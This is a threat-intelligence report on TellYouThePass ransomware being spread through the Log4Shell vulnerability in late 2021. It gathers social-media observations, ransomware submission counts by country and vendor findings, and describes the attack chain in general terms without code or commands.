The Log4j2 exploit Log4Shell is being used to deploy TellYouThePass ransomware, an old and inactive ransomware family; prior to this event, TellYouThePass ransomware had not been mentioned on Twitter since 2020-07-23.
Research has been published in the Chinese-speaking community, but not in the English-speaking community until now. Judging from threat reports, this threat appears to be prominently affecting Chinese victims. We would like to especially highlight that TellYouThePass does not operate as a RaaS (Ransomware-as-a-Service).
- Twitter user @80vul observed that ransomware was deployed on an old system that contained an internet-facing Log4j2 RCE vulnerability; another [now deleted] message was posted, with multiple responses containing references to TellYouThePass.
- Twitter users @Tork_88 and @cibernicola_es responded with an indication that the ransomware family may have been called "TellYouThePass".
- Curated Intel member @PolarToffee responded with an ID-Ransomware (IDR) metric, proving that on December 13th, more than 30 samples of "TellYouThePass" ransomware were submitted to IDR, indicating that "a very sudden spike in submissions for what is a very old ransomware [that day]." Toffee further elaborates that she is "not saying they are using log4j2 but that's certainly interesting."
- On 2021-12-17, Curated Intel member @PolarToffee provided a follow-up ID-Ransomware (IDR) statistic. In this telemetry, between 2021-12-13 and 2021-12-17, victim geographies submitting ransom notes to IDR included China (20), Hong Kong (2), Japan (2), Taiwan (2), Belarus (1), Thailand (1), and United States (1).
- Sangfor Threat Intelligence Team captured TellYouThePass ransomware samples and conducted an analysis, identifying TellYouThePass ransomware being deployed using the Log4j2 exploit.
- Through honeypot collections, they identified TellYouThePass ransomware launching "thousands of attacks" against "[OA systems and an open-source project]" that contain Log4j2 vulnerabilities.
- The group used the CVE-2021-44228 Log4Shell exploit to carry out an attack en masse.
- A command and control server will be communicated with as a background task.
- After executing the exploit, they will download the ransomware file to Windows or Linux systems, and execute it to encrypt files.
- Ransom notes are written to files called "README.html".
- The referenced security blog shares what they claim to be "a large number of TellYouThePass ransomware interception logs."
- The group deployed "only in the time period from 17:00 to 19:00 on December 12 and 17:00 to 19:00 on December 13, user data in multiple [Chinese] provinces and different industries have been encrypted, and they are all OA systems
- Curated Intel members @nokae8 and @Myrtus0x0 analyzed a payload delivered to a vulnerable system via the Log4j2 exploit; ransomware was deployed and based on an analysis of the ransom note, they concluded the ransomware likely belong to the "TellYouThePass" ransomware family.
- They kindly shared the malicious ransom file and Java class file for sharing via Curated Intel (see below), the contents of which can be validated with this sample.